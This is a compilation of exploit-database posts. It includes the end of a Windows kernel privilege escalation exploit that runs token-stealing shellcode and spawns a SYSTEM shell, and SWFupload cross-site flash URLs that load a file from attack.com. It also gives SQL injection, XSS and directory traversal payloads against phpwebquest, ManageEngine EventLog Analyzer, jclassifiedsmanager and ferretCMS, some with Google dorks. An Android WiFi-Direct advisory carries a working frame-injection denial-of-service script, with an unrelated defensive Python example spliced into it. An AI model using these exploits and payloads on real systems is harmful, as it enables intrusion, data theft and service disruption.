printf("[+] Allocating memory at [0x%p]\n", base_addr);
allocstatus = NtAllocateVirtualMemory(INVALID_HANDLE_VALUE, &base_addr, 0, &size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
if (allocstatus)
{
printf("[-] An error occured while mapping executable memory. Status = 0x%08x\n", allocstatus);
printf("Error : %d\n", GetLastError());
return -1;
}
printf("[+] NtAllocateVirtualMemory successful\n");
memset(buffer, 0x90, BUFSIZE);
memcpy(buffer+0x00000007, ESInull, sizeof(ESInull)-1);
memcpy(buffer+0x0000007f, RETaddr, sizeof(RETaddr)-1);
if (GetWindowsVersion() == 1)
{
printf("[i] Running Windows XP\n");
memcpy(buffer+0x00000100, token_steal_xp, sizeof(token_steal_xp));
printf("[i] Size of shellcode %d bytes\n", sizeof(token_steal_xp));
}
else if (GetWindowsVersion() == 2)
{
printf("[i] Running Windows 7\n");
memcpy(buffer+0x00000100, token_steal_w7, sizeof(token_steal_w7));
printf("[i] Size of shellcode %d bytes\n", sizeof(token_steal_w7));
}
else if (GetWindowsVersion() == 0)
{
printf("[i] Exploit not supported on this OS\n\n");
return -1;
}
rwresult = WriteProcessMemory(INVALID_HANDLE_VALUE, (LPVOID)0x00000001, buffer, BUFSIZE, &written);
if (rwresult == 0)
{
printf("[-] An error occured while mapping writing memory: %d\n", GetLastError());
return -1;
}
printf("[+] WriteProcessMemory %d bytes written\n", written);
printf("[~] Press any key to Exploit . . .\n");
getch();
hDevice = CreateFile(devhandle, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING , 0, NULL);
if (hDevice == INVALID_HANDLE_VALUE)
{
printf("[-] CreateFile open %s device failed (%d)\n\n", devhandle, GetLastError());
return -1;
}
else
{
printf("[+] Open %s device successful\n", devhandle);
}
CloseHandle(hDevice);
printf("[+] Spawning SYSTEM Shell\n");
spawnShell();
return 0;
}
# Exploit Title: SWFupload All Version XSF Vulnerability
# Date: 25/01/2014
# Exploit Author: MindCracker - Team MaDLeeTs
# Contact : MindCrackerKhan@Gmail.com - Maddy@live.com.pk | https://twitter.com/MindCrackerKhan
# Version : All
# Tested on: Linux / Windows
# Description :
XSF occurs when an SWF has permission to load another file from another directory or site. The vulnerable
SWF can be exploited by just loading an SWF/image/any file (like phishing or cross-site scripting).
# Vulnerable Code :
1.
try
{
    ExternalInterface.addCallback("SetButtonTextStyle",this.SetButtonTextStyle);
    this.SetButtonTextStyle(String(root.loaderInfo.parameters.buttonTextStyle));
}
catch(ex:Object)
{
    this.SetButtonTextStyle("");
}
As you can see, the buttonTextStyle variable is not well configured (the value is taken exactly as given) and this ButtonTextStyle will accept any value.
The vulnerable SWF will load any file:
http://victim.com/buttontextstyle.swf?buttonTextStyle=http://attack.com/Exploiting.swf
2.
try
{
    ExternalInterface.addCallback("SetButtonText",this.SetButtonText);
    this.SetButtonText(String(root.loaderInfo.parameters.buttonText));
}
catch(ex:Object)
{
    this.SetButtonText("");
}
#POC
http://victim.com/swfupload.swf?buttonTextStyle=http://attack.com/Exploiting.swf
# Exploit Title: sql injection
# Google Dork: inurl:webquest/soporte_horizontal_w.php?id_actividad=
# Date: [24/01/2015]
# Exploit Author: [jord4nroo7] anonjo@aol.com
# Vendor Homepage: [http://phpwebquest.org]
# Software Link: [http://phpwebquest.org/?page_id=14]
# Version: [phpwebquest-2.6]
# Tested on: [windows 8.1]
#Exploit: SQL injection found in the phpwebquest script version 2.6
#
#example http://localhost/phpwq/webquest/soporte_horizontal_w.php?id_actividad=184&id_pagina=1%27'
#---------------------------
if ($_GET['id_actividad']!=''){
    $id_actividad=$_GET['id_actividad'];   ---------> SQL injection here
}else{
    $id_actividad='1500000';
}
if ($_GET['id_pagina']!=''){
    $id_pagina=$_GET['id_pagina'];
}else{
    $id_pagina='1';
    $texto_actual=$texto_alternativo;
    $imagen_actual='../imagenes/no_imagen.gif';
}
#----------------------------
<?
session_cache_limiter('nocache,private');
session_start();
session_set_cookie_params(0, "/", $HTTP_SERVER_VARS["HTTP_HOST"], 0);
include("../include/mysql.php");
include("../include/idioma.php");
$base=$mysql_db;
$c=mysql_connect($mysql_server,$mysql_login,$mysql_pass);
mysql_select_db ($base, $c);
# to work around a problem that arises when users create the activity but do not create any pages
if ($_GET['id_actividad']!=''){
    $id_actividad=$_GET['id_actividad'];
}else{
    $id_actividad='1500000';
}
if ($_GET['id_pagina']!=''){
    $id_pagina=$_GET['id_pagina'];
}else{
    $id_pagina='1';
    $texto_actual=$texto_alternativo;
    $imagen_actual='../imagenes/no_imagen.gif';
}
#echo "PAGINA DEL GET:".$id_pagina."<br>";
$sentencia= "SELECT * FROM actividad WHERE id_actividad=".$id_actividad;
$resultado=mysql_query($sentencia);
while($v=mysql_fetch_array($resultado)){
    foreach ($v as $indice=>$valor){
        if(!is_int($indice)){
            # echo $indice.":".$valor."<br>";
            $campo[$indice]=$valor;
        }
    }
}
$sentencia="select * from pagina where id_actividad=".$id_actividad." order by num_pagina asc";
$resultado=mysql_query($sentencia);
$j=1;
while($v=mysql_fetch_array($resultado)){
    foreach ($v as $indice=>$valor){
        if(!is_int($indice)){
            #echo $indice.":".$valor."<br>";
            $campo[$j][$indice]=$valor;
        }
    }
    $j++;
}
for ($cont=1; $cont<=5; $cont++){
    if ($campo[$cont]['num_pagina']==$id_pagina){
        $texto_actual=$campo[$cont]['texto'];
        $imagen_actual=$campo[$cont]['imagen'];
    }
}
$resta=0;
$tamano_enlaces=$campo['font_size'] - $resta ;
$tamano_titulo=$campo['font_size'];
#echo $tamano_titulo;
?>
<html>
<head>
<title>PHP Webquest</title>
<!-- Webquest built with PHP Webquest http://www.phpwebquest.org
Program written by Antonio Temprano under the GPL license
It may be used free of charge by anyone who wishes to do so for
educational purposes, with the obligation not to remove these lines of code
-->
<style>
table {
font-family : <? echo $campo['font_face'];?>;
font-size : <? echo $campo['font_size'];?>;
font-weight : normal;
color: <? echo $campo['color_texto_principal'];?>;
}
a {
font-family : <? echo $campo['font_face'];?>;
font-size : <? echo $campo['font_size'];?>;
text-decoration: none;
color: <? echo $campo['color_enlaces'];?>;
font-weight : normal;
}
a:hover {
position: relative;
top: 1px;
left: 1px;
font-family : <? echo $campo['font_face'];?>;
font-size : <? echo $campo['font_size'];?>;
text-decoration: none;
color: <? echo $campo['color_enlaces_resaltados'];?>;
font-weight : normal;
}
div.phpwebquest { font-size : 7.5pt;}
div.phpwebquest a:link { font-size : 7.5pt;}
div.phpwebquest a:hover { font-size : 7.5pt;}
div.phpwebquest a { font-size : 7.5pt;};
</style>
</head>
<body bgcolor="<? echo $campo['color_fondo_pagina'];?>">
<div align="center">
<table width="750" border="0" cellpadding="0" cellspacing="1" bgcolor="<? echo $campo['color_cuadro_pagina'];?>">
<tr>
<td><div align="center">
<table width="100%" border="0" cellpadding="0" cellspacing="1" bgcolor="<? echo $campo['color_cuadro_texto'];?>">
<tr>
<td><table width="100%" border="0" cellspacing="1" cellpadding="0">
<tr>
<td height="50"><div valign="middle" align="center"><h1><font color="<? echo $campo['color_texto_titulo'];?>"><? echo $campo['titulo'];?></font></h1></div></td>
</tr>
<tr>
<? if ($id_pagina==1){
$titular=$introduccion;
}elseif($id_pagina==2){
$titular=$tareas;
}elseif($id_pagina==3){
$titular=$proceso;
}elseif($id_pagina==4){
$titular=$evaluacion;
}else{
$titular=$conclusiones;
}
?>
<td height="50" bgcolor="<? echo $campo['color_cuadro_pagina'];?>"><font color="<? echo $campo['color_texto_tipo'];?>"><div valign="middle" align="center"><h3><? echo $titular;?></h3></div></font></td>
</tr>
<tr>
<td><table width="100%" border="0" cellspacing="1" cellpadding="0">
<tr>
<td width="81%" valign="top"><table width="100%" height="141" border="0" cellpadding="0" cellspacing="1">
<tr>
<td width="1%" height="139"> </td>
<td width="97%" valign="middle"><div align="left">
<table width="100%" height="134" border="0" cellpadding="0" cellspacing="1">
<tr>
<td width="1%" valign="top"><div align="left"><img src="<? echo $imagen_actual;?>"></div></td>
<td width="2%"> </td>
<td width="97%"><? echo $texto_actual;?><br>
<table align=center width="80%" border=0 bgcolor="<? echo $campo['color_cuadro_menu'];?>">
<? if ($id_pagina==3){
echo '<tr></tr>';
$sentencia="select url, descripcion from url where id_actividad=".$id_actividad;
$resultado=mysql_query($sentencia);
$j=1;
while($v=mysql_fetch_array($resultado)){
foreach ($v as $indice=>$valor){
if(!is_int($indice)){
if($indice=='url'){
echo '<tr><td><div class="celdamenu"><a href='.$valor.' target="_blank"></div>';
}else{
echo $valor."</td></tr>";
}
$url[$j][$indice]=$valor;
}
}
$j++;
}
}
mysql_close($c);
?>
</table>
</td>
</tr>
</table>
</div></td>
<td width="2%"> </td>
</tr>
</table></td>
<td width="15%" valign="top">
<table width="100%" border="0" cellspacing="1" cellpadding="0" bgcolor="<? echo $campo['color_cuadro_texto'];?>" bordercolor="#FFFFFF"><tr><td> </td></tr></table>
<table width="100%" border="0" cellspacing="1" cellpadding="0" bgcolor="<? echo $campo['color_cuadro_menu'];?>" bordercolor="#FFFFFF">
<tr>
<td><div align="left"><a href="soporte_derecha_w.php?id_actividad=<? echo $campo[1]['id_actividad']."&id_pagina=1"; ?>"> <? echo $enlace_introduccion; ?></a></div></td>
</tr>
<tr>
<td height="1" bgcolor="#FFFFFF"></td>
</tr>
<tr>
<td><div align="left"><a href="soporte_derecha_w.php?id_actividad=<? echo $campo[1]['id_actividad']."&id_pagina=2"; ?>"> <? echo $enlace_tareas; ?></a></div></td>
</tr>
<tr>
<td height="1" bgcolor="#FFFFFF"></td>
</tr>
<tr>
<td><div align="left"><a href="soporte_derecha_w.php?id_actividad=<? echo $campo[1]['id_actividad']."&id_pagina=3"; ?>"> <? echo $enlace_proceso; ?></a></font></div></td>
</tr>
<tr>
<td height="1" bgcolor="#FFFFFF"></td>
</tr>
<tr>
<td><div align="left"><a href="soporte_derecha_w.php?id_actividad=<? echo $campo[1]['id_actividad']."&id_pagina=4"; ?>"> <? echo $enlace_evaluacion; ?></a></font></div></td>
</tr>
<tr>
<td height="1" bgcolor="#FFFFFF"></td>
</tr>
<tr>
<td><div align="left"><a href="soporte_derecha_w.php?id_actividad=<? echo $campo[1]['id_actividad']."&id_pagina=5"; ?>"> <? echo $enlace_conclusiones; ?></a></font></div></td>
</tr>
</table></td>
</tr>
</table></td>
</tr>
</table></td>
</tr>
<tr>
<td height="19">
<table width="100%" border="0" cellspacing="1" cellpadding="0">
<tr>
<td width="55%"><div class="phpwebquest" align="right"><? echo $elaborada; ?> <? echo $campo['autor'];?> <? echo $con; ?></div></td>
<td width="45%"><div class="phpwebquest" align="left"><a href="http://www.phpwebquest.org"> PHPWebquest</a></div></td>
</tr>
</table>
</td>
</tr>
</table>
</div></td>
</tr>
</table>
</div>
</body>
</html>
#greetz to all my friends ,balawi,ro3ob hr ,mothana-X , sharingan jo , and anonymous jo , and all muslim hackers
################################################################################################
# ...:::::ManageEngine EventLog Analyzer Directory Traversal/XSS Vulnerabilities::::.... #
################################################################################################
Sobhan System Network & Security Group (sobhansys)
-------------------------------------------------------
# Date: 2015-01-24
# Exploit Author: AmirHadi Yazdani (Sobhansys Co)
# Vendor Homepage: http://www.manageengine.com/products/eventlog/
# Demo Link: http://demo.eventloganalyzer.com/event/index3.do
#Affected version: <= Build Version : 9.0
About ManageEngine EventLog Analyzer (From Vendor Site) :
EventLog Analyzer provides the most cost-effective Security Information and Event Management (SIEM) software on the market.
Using this Log Analyzer software, organizations can automate
the entire process of managing terabytes of machine generated logs by collecting, analyzing, correlating, searching, reporting,
and archiving from one central location.
This event log analyzer software helps to monitor file integrity, conduct log forensics analysis,
monitor privileged users and comply to different compliance regulatory bodies
by intelligently analyzing your logs and instantly generating a variety of reports like user activity reports, historical trend reports, and more.
--------------------------------------------------------
I'M hadihadi From Virangar Security Team
special tnx to:MR.nosrati,black.shadowes,MR.hesy
& all virangar members & all hackerz
greetz to My friends In Signal IT Group (www.signal-net.net) & A.Molaei
spl:Z.Khodaee
-------
exploit:
Directory Traversal :
http://127.0.0.1/event/index2.do?helpP=userReport&overview=true&tab=report&url=../../WEB-INF/web.xml%3f
http://127.0.0.1/event/index2.do?completeData=true&helpP=archiveAction&tab=system&url=../../WEB-INF/web.xml%3f
http://127.0.0.1/event/index2.do?helpP=fim&link=0&sel=13&tab=system&url=../../WEB-INF/web.xml%3f
XSS :
http://127.0.0.1/event/index2.do?helpP=userReport&overview=true&tab=report&url=userReport'%22()%26%25<ahy><ScRiPt%20>prompt(915375)</ScRiPt>
http://127.0.0.1/event/index2.do?helpP=fim&link=0&sel=13'%22()%26%25<ahy><ScRiPt%20>prompt(978138)</ScRiPt>&tab=system&url=ConfigureTemplate
----
Sobhan system Co.
Signal Network And Security Group (www.signal-net.net)
E-mail: amirhadi.yazdani@gmail.com,a.h.yazdani@signal-net.net
# Exploit Title: jclassifiedsmanager Multiple Vulnerabilities
# Google Dork: inurl:com_jclassifiedsmanager
# Date: 26 Jan 2015
# Exploit Author: Sarath Nair aka AceNeon13
# Contact: @AceNeon13
# Greetings: HariKrishnan, Raj3sh.tv, Deepu.tv
# Vendor Homepage: cmsjunkie.com
# Software Link: http://www.cmsjunkie.com/classifieds-manager
# PoC Exploit: SQL Injection
--------------------------------
http://localhost/jclassifiedsmanager/classifieds/offerring-ads?controller=displayads&view=displayads&task=viewad&id=[SQL Injection Here]
"id" parameter is not sanitized.
# PoC Exploit: XSS Reflected
--------------------------------
http://localhost/jclassifiedsmanager/classifieds?view=displayads7ed3b"onload%3d"alert(1)"87d4d&layout=offerring&controller=displayads&adtype=1
"view" parameter is not sanitized.
########################################
# Vulnerability Disclosure Timeline:
2014-Dec-11: Discovered vulnerability
2014-Dec-12: Vendor Notification
2014-Dec-12: Vendor Response/Feedback
2015-Jan-19: Vendor Fix/Patch
2015-Jan-26: Public Disclosure
#######################################
Core Security - Corelabs Advisory
http://corelabs.coresecurity.com/
Android WiFi-Direct Denial of Service
1. *Advisory Information*
Title: Android WiFi-Direct Denial of Service
Advisory ID: CORE-2015-0002
Advisory URL:
http://www.coresecurity.com/advisories/android-wifi-direct-denial-service
Date published: 2015-01-26
Date of last update: 2015-01-26
Vendors contacted: Android Security Team
Release mode: User release
2. *Vulnerability Information*
Class: Uncaught Exception [CWE-248]
Impact: Denial of service
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-2014-0997
3. *Vulnerability Description*
Some Android devices are affected by a denial of service attack when
scanning for WiFi Direct devices.
An attacker could send a specially crafted 802.11 Probe Response frame
causing the Dalvik subsystem to reboot because of an unhandled exception
in the WiFiMonitor class.
4. *Vulnerable Packages*
. Nexus 5 - Android 4.4.4
. Nexus 4 - Android 4.4.4
. LG D806 - Android 4.2.2
. Samsung SM-T310 - Android 4.2.2
. Motorola RAZR HD - Android 4.1.2
Other devices could also be affected.
5. *Non-vulnerable packages*
. Android 5.0.1
. Android 5.0.2
6. *Vendor Information, Solutions and Workarounds*
Some mitigation actions may be to avoid using WiFi-Direct or update
to a non-vulnerable Android version.
Contact vendor for further information.
7. *Credits*
This vulnerability was discovered and researched by Andres Blanco
from the CoreLabs
Team. The publication of this advisory was coordinated by the Core
Advisories
Team.
8. *Technical Description / Proof of Concept Code*
Android makes use of a modified *wpa_supplicant* [1]
in order to provide an interface between the wireless driver and the
Android platform framework.
Below is the function that handles *wpa_supplicant* events. It returns
a jstring obtained by calling the NewStringUTF method.
/-----
static jstring android_net_wifi_waitForEvent(JNIEnv* env, jobject)
{
char buf[EVENT_BUF_SIZE];
int nread = ::wifi_wait_for_event(buf, sizeof buf);
if (nread > 0) {
return env->NewStringUTF(buf);
} else {
return NULL;
}
}
-----/
The WiFi-Direct specification defines the P2P discovery procedure to
enable P2P devices to exchange device information; the device name is
part of this information.
The WifiP2pDevice class, located at
/wifi/java/android/net/wifi/p2p/WifiP2pDevice.java,
represents a Wi-Fi P2P device. The constructor receives the string
provided by *wpa_supplicant* and throws an IllegalArgumentException in
case the event is malformed.
Below is partial content of the WifiP2pDevice.java file.
/-----
[...]
    /** Detailed device string pattern with WFD info
     * Example:
     * P2P-DEVICE-FOUND 00:18:6b:de:a3:6e p2p_dev_addr=00:18:6b:de:a3:6e
     * pri_dev_type=1-0050F204-1 name='DWD-300-DEA36E' config_methods=0x188
     * dev_capab=0x21 group_capab=0x9
     */
    private static final Pattern detailedDevicePattern = Pattern.compile(
        "((?:[0-9a-f]{2}:){5}[0-9a-f]{2}) " +
        "(\\d+ )?" +
        "p2p_dev_addr=((?:[0-9a-f]{2}:){5}[0-9a-f]{2}) " +
        "pri_dev_type=(\\d+-[0-9a-fA-F]+-\\d+) " +
        "name='(.*)' " +
        "config_methods=(0x[0-9a-fA-F]+) " +
        "dev_capab=(0x[0-9a-fA-F]+) " +
        "group_capab=(0x[0-9a-fA-F]+)" +
        "( wfd_dev_info=0x000006([0-9a-fA-F]{12}))?"
    );
[...]
    /**
     * @param string formats supported include
     * P2P-DEVICE-FOUND fa:7b:7a:42:02:13 p2p_dev_addr=fa:7b:7a:42:02:13
     * pri_dev_type=1-0050F204-1 name='p2p-TEST1' config_methods=0x188 dev_capab=0x27
     * group_capab=0x0 wfd_dev_info=000006015d022a0032
     *
     * P2P-DEVICE-LOST p2p_dev_addr=fa:7b:7a:42:02:13
     *
     * AP-STA-CONNECTED 42:fc:89:a8:96:09 [p2p_dev_addr=02:90:4c:a0:92:54]
     *
     * AP-STA-DISCONNECTED 42:fc:89:a8:96:09 [p2p_dev_addr=02:90:4c:a0:92:54]
     *
     * fa:7b:7a:42:02:13
     *
     * Note: The events formats can be looked up in the wpa_supplicant code
     * @hide
     */
    public WifiP2pDevice(String string) throws IllegalArgumentException {
        String[] tokens = string.split("[ \n]");
        Matcher match;
        if (tokens.length < 1) {
            throw new IllegalArgumentException("Malformed supplicant event");
        }
        switch (tokens.length) {
            case 1:
                /* Just a device address */
                deviceAddress = string;
                return;
            case 2:
                match = twoTokenPattern.matcher(string);
                if (!match.find()) {
                    throw new IllegalArgumentException("Malformed supplicant event");
                }
                deviceAddress = match.group(2);
                return;
            case 3:
                match = threeTokenPattern.matcher(string);
                if (!match.find()) {
                    throw new IllegalArgumentException("Malformed supplicant event");
                }
                deviceAddress = match.group(1);
                return;
            default:
                match = detailedDevicePattern.matcher(string);
                if (!match.find()) {
                    throw new IllegalArgumentException("Malformed supplicant event");
                }
                deviceAddress = match.group(3);
                primaryDeviceType = match.group(4);
                deviceName = match.group(5);
                wpsConfigMethodsSupported = parseHex(match.group(6));
                deviceCapability = parseHex(match.group(7));
                groupCapability = parseHex(match.group(8));
                if (match.group(9) != null) {
                    String str = match.group(10);
                    wfdInfo = new WifiP2pWfdInfo(parseHex(str.substring(0,4)),
                            parseHex(str.substring(4,8)),
                            parseHex(str.substring(8,12)));
                }
                break;
        }
        if (tokens[0].startsWith("P2P-DEVICE-FOUND")) {
            status = AVAILABLE;
        }
    }
[...]
-----/
On some Android devices, processing a probe response frame carrying a
WiFi-Direct (P2P) information element whose device name attribute
contains specific bytes generates a malformed supplicant event string,
which ends up throwing the IllegalArgumentException.
As this exception is not handled, the Android system restarts.
Below is partial content of the logcat of a Samsung SM-T310 running
Android 4.2.2.
/-----
I/p2p_supplicant( 2832): P2P-DEVICE-FOUND 00.EF.00 p2p_dev_addr=00.EF.00 pri_dev_type=10-0050F204-5 'fa¬¬' config_methods=0x188 dev_capab=0x21 group_capab=0x0
E/AndroidRuntime( 2129): !@*** FATAL EXCEPTION IN SYSTEM PROCESS: WifiMonitor
E/AndroidRuntime( 2129): java.lang.IllegalArgumentException: Malformed supplicant event
E/AndroidRuntime( 2129): at android.net.wifi.p2p.WifiP2pDevice.<init>(WifiP2pDevice.java:229)
E/AndroidRuntime( 2129): at android.net.wifi.WifiMonitor$MonitorThread.handleP2pEvents(WifiMonitor.java:966)
E/AndroidRuntime( 2129): at android.net.wifi.WifiMonitor$MonitorThread.run(WifiMonitor.java:574)
E/android.os.Debug( 2129): !@Dumpstate > dumpstate -k -t -z -d -o /data/log/dumpstate_sys_error
-----/
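To make the failure mode concrete, here is an added Python example (not part of the Core advisory nor of Android's code) that ports the detailedDevicePattern regex and constructor logic quoted above and then shows the handling a monitor thread should apply: the malformed logcat event raises, and the wrapper logs and drops it instead of letting the exception escape and restart the system. The well-formed sample event is adapted from the constructor's own Javadoc with a 0x-prefixed wfd_dev_info so the WFD branch is exercised; the AVAILABLE value and the two-/three-token handling are assumptions, since those pieces are not quoted in the advisory.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Port of the detailedDevicePattern regex quoted from WifiP2pDevice.java.
DETAILED_DEVICE_PATTERN = re.compile(
    r"((?:[0-9a-f]{2}:){5}[0-9a-f]{2}) "
    r"(\d+ )?"
    r"p2p_dev_addr=((?:[0-9a-f]{2}:){5}[0-9a-f]{2}) "
    r"pri_dev_type=(\d+-[0-9a-fA-F]+-\d+) "
    r"name='(.*)' "
    r"config_methods=(0x[0-9a-fA-F]+) "
    r"dev_capab=(0x[0-9a-fA-F]+) "
    r"group_capab=(0x[0-9a-fA-F]+)"
    r"( wfd_dev_info=0x000006([0-9a-fA-F]{12}))?"
)

AVAILABLE = 3  # assumed value; the advisory does not quote the constant


@dataclass
class WifiP2pDevice:
    device_address: str
    device_name: Optional[str] = None
    primary_device_type: Optional[str] = None
    wps_config_methods: Optional[int] = None
    device_capability: Optional[int] = None
    group_capability: Optional[int] = None
    wfd_info: Optional[Tuple[int, int, int]] = None
    status: Optional[int] = None


def parse_hex(s: str) -> int:
    # int() accepts an optional 0x prefix when base 16 is given
    return int(s, 16)


def parse_supplicant_event(event: str) -> WifiP2pDevice:
    """Mirror of the WifiP2pDevice(String) constructor. Raises ValueError
    (the Java IllegalArgumentException) on a malformed event."""
    tokens = re.split(r"[ \n]", event)
    if len(tokens) < 1:
        raise ValueError("Malformed supplicant event")
    if len(tokens) == 1:
        # Just a device address, taken as-is like the Java code does
        return WifiP2pDevice(device_address=event)
    if len(tokens) in (2, 3):
        # twoTokenPattern / threeTokenPattern are not quoted in the advisory,
        # so this example treats those event shapes as unsupported.
        raise ValueError("two/three-token events not handled in this example")
    m = DETAILED_DEVICE_PATTERN.search(event)  # Java's Matcher.find()
    if not m:
        raise ValueError("Malformed supplicant event")
    dev = WifiP2pDevice(
        device_address=m.group(3),
        primary_device_type=m.group(4),
        device_name=m.group(5),
        wps_config_methods=parse_hex(m.group(6)),
        device_capability=parse_hex(m.group(7)),
        group_capability=parse_hex(m.group(8)),
    )
    if m.group(9) is not None:
        s = m.group(10)
        dev.wfd_info = (parse_hex(s[0:4]), parse_hex(s[4:8]), parse_hex(s[8:12]))
    if tokens[0].startswith("P2P-DEVICE-FOUND"):
        dev.status = AVAILABLE
    return dev


def handle_p2p_event(event: str) -> Optional[WifiP2pDevice]:
    """The hardened handler: a supplicant event is derived from an
    unauthenticated radio frame, so a parse failure is logged and the
    event dropped rather than allowed to escape the monitor thread."""
    try:
        return parse_supplicant_event(event)
    except ValueError as exc:
        print(f"[dropped] {exc}: {event!r}")
        return None


def process_events(events: List[str]) -> Tuple[List[WifiP2pDevice], int]:
    """Run a stream of events through the handler; returns (devices, dropped)."""
    devices, dropped = [], 0
    for ev in events:
        dev = handle_p2p_event(ev)
        if dev is None:
            dropped += 1
        else:
            devices.append(dev)
    return devices, dropped


# Constructed sample input: a well-formed event (adapted from the Javadoc),
# a bare address, and the malformed event seen in the SM-T310 logcat.
GOOD_EVENT = ("P2P-DEVICE-FOUND fa:7b:7a:42:02:13 p2p_dev_addr=fa:7b:7a:42:02:13 "
              "pri_dev_type=1-0050F204-1 name='p2p-TEST1' config_methods=0x188 "
              "dev_capab=0x27 group_capab=0x0 wfd_dev_info=0x000006015d022a0032")
ADDRESS_ONLY_EVENT = "fa:7b:7a:42:02:13"
MALFORMED_EVENT = ("P2P-DEVICE-FOUND 00.EF.00 p2p_dev_addr=00.EF.00 "
                   "pri_dev_type=10-0050F204-5 'fa\u00ac\u00ac' config_methods=0x188 "
                   "dev_capab=0x21 group_capab=0x0")
SAMPLE_EVENTS = [GOOD_EVENT, ADDRESS_ONLY_EVENT, MALFORMED_EVENT]

if __name__ == "__main__":
    found, dropped = process_events(SAMPLE_EVENTS)
    print(f"parsed {len(found)} device(s), dropped {dropped} malformed event(s)")
```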
8.1. *Proof of Concept*
This PoC was implemented using the open source library Lorcon
[2] and PyLorcon2 [3], a Python wrapper for the Lorcon library.
/-----
#!/usr/bin/env python
import sys
import time
import struct
import PyLorcon2

def get_probe_response(source, destination, channel):
    frame = str()
    frame += "\x50\x00" # Frame Control
    frame += "\x00\x00" # Duration
    frame += destination
    frame += source
    frame += source
    frame += "\x00\x00" # Sequence Control
    frame += "\x00\x00\x00\x00\x00\x00\x00\x00" # Timestamp
    frame += "\x64\x00" # Beacon Interval
    frame += "\x30\x04" # Capabilities Information
    # SSID IE
    frame += "\x00"
    frame += "\x07"
    frame += "DIRECT-"
    # Supported Rates
    frame += "\x01"
    frame += "\x08"
    frame += "\x8C\x12\x98\x24\xB0\x48\x60\x6C"
    # DS Parameter Set
    frame += "\x03"
    frame += "\x01"
    frame += struct.pack("B", channel)
    # P2P
    frame += "\xDD"
    frame += "\x27"
    frame += "\x50\x6F\x9A"
    frame += "\x09"
    # P2P Capabilities
    frame += "\x02" # ID
    frame += "\x02\x00" # Length
    frame += "\x21\x00"
    # P2P Device Info
    frame += "\x0D" # ID
    frame += "\x1B\x00" # Length
    frame += source
    frame += "\x01\x88"
    frame += "\x00\x0A\x00\x50\xF2\x04\x00\x05"
    frame += "\x00"
    frame += "\x10\x11"
    frame += "\x00\x06"
    frame += "fafa\xFA\xFA"
    return frame

def str_to_mac(address):
    return "".join(map(lambda i: chr(int(i, 16)), address.split(":")))

if __name__ == "__main__":
    if len(sys.argv) != 3:
        print "Usage:"
        print " poc.py <iface> <target>"
        print "Example:"
        print " poc.py wlan0 00:11:22:33:44:55"
        sys.exit(-1)
    iface = sys.argv[1]
    destination = str_to_mac(sys.argv[2])
    context = PyLorcon2.Context(iface)
    context.open_injmon()
    channel = 1
    source = str_to_mac("00:11:22:33:44:55")
    frame = get_probe_response(source, destination, channel)
    print "Injecting PoC."
    for i in range(100):
        context.send_bytes(frame)
        time.sleep(0.100)
-----/
9. *Report Timeline*
. 2014-09-26:
Core Security contacts the Android security team to inform them that
a vulnerability has been found in Android. Core Security sends a draft
advisory with technical details and PoC files.
. 2014-09-29:
Android Security Team acknowledges reception of the advisory.
. 2014-09-30:
Core Security notifies that the tentative publication date is
set for Oct 20th, 2014.
. 2014-09-30:
Android Security Team acknowledges.
. 2014-10-16:
Core Security requests a status update.
. 2014-10-16:
Android Security Team responds that they have classified the
vulnerability as low severity and don't currently have a timeline for
releasing a fix.
. 2014-10-20:
Core Security does not completely agree with the vulnerability
classification and reschedules the publication of the advisory.
. 2014-10-16:
Android Security Team acknowledges and strengthens its position
that they don't currently have a timeline for releasing a fix.
. 2015-01-06:
Core Security requests a status update.
. 2015-01-12:
Core Security asks for confirmation of reception of the previous
email.
. 2015-01-16:
Android Security Team acknowledges and responds that they don't
currently have a timeline for releasing a fix.
. 2015-01-19:
Core Security notifies that vendor cooperation is needed in
order to keep this process coordinated. If the vendor refuses to provide the
requested information the advisory will be released tagged as 'user
release'. The advisory is re-scheduled for January 26th, 2015.
. 2015-01-20:
Android Security Team acknowledges and responds that they don't
currently have a timeline for releasing a fix.
. 2015-01-26:
The advisory CORE-2015-0002 is published.
10. *References*
[1] - wpa_supplicant site. http://w1.fi/wpa_supplicant/
[2] - Lorcon site. https://code.google.com/p/lorcon
[3] - PyLorcon2 site. http://code.google.com/p/pylorcon2
11. *About CoreLabs*
CoreLabs, the research center of Core Security, is charged with
anticipating
the future needs and requirements for information security technologies.
We conduct our research in several important areas of computer security
including system vulnerabilities, cyber attack planning and simulation,
source code auditing, and cryptography. Our results include problem
formalization, identification of vulnerabilities, novel solutions and
prototypes for new technologies. CoreLabs regularly publishes security
advisories, technical papers, project information and shared software
tools for public use at:
http://corelabs.coresecurity.com.
12. *About Core Security Technologies*
Core Security Technologies enables organizations to get ahead of threats
with security test and measurement solutions that continuously identify
and demonstrate real-world exposures to their most critical assets. Our
customers can gain real visibility into their security standing, real
validation of their security controls, and real metrics to more
effectively secure their organizations.
Core Security's software solutions build on over a decade of trusted
research and leading-edge threat expertise from the company's Security
Consulting Services, CoreLabs and Engineering groups. Core Security
Technologies can be reached at +1 (617) 399-6980 or on the Web at:
http://www.coresecurity.com.
13. *Disclaimer*
The contents of this advisory are copyright
(c) 2014 Core Security and (c) 2014 CoreLabs,
and are licensed under a Creative Commons
Attribution Non-Commercial Share-Alike 3.0 (United States) License:
http://creativecommons.org/licenses/by-nc-sa/3.0/us/
14. *PGP/GPG Keys*
This advisory has been signed with the GPG key of Core Security
advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.
Advisory:
Advisory ID: SROEADV-2015-10
Author: Steffen Rösemann
Affected Software: ferretCMS v. 1.0.4-alpha
Vendor URL: https://github.com/JRogaishio/ferretCMS
Vendor Status: vendor will patch eventually
CVE-ID: -
Tested on:
- Firefox 35, Iceweasel 31
- Mac OS X 10.10, Kali Linux 1.0.9a
==========================
Vulnerability Description:
==========================
The content management system ferretCMS v.1.0.4, which is currently in
alpha development stage, suffers from multiple stored/reflecting XSS- and
SQLi-vulnerabilities in its administrative backend.
Moreover, there exists the possibility to upload arbitrary files via the
administrative backend, which can be executed by unauthenticated users, too.
==================
Technical Details:
==================
A reflecting XSS vulnerability can be found in the parameter "action" used
in the file admin.php:
http://{TARGET}/admin.php?type=search&action=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
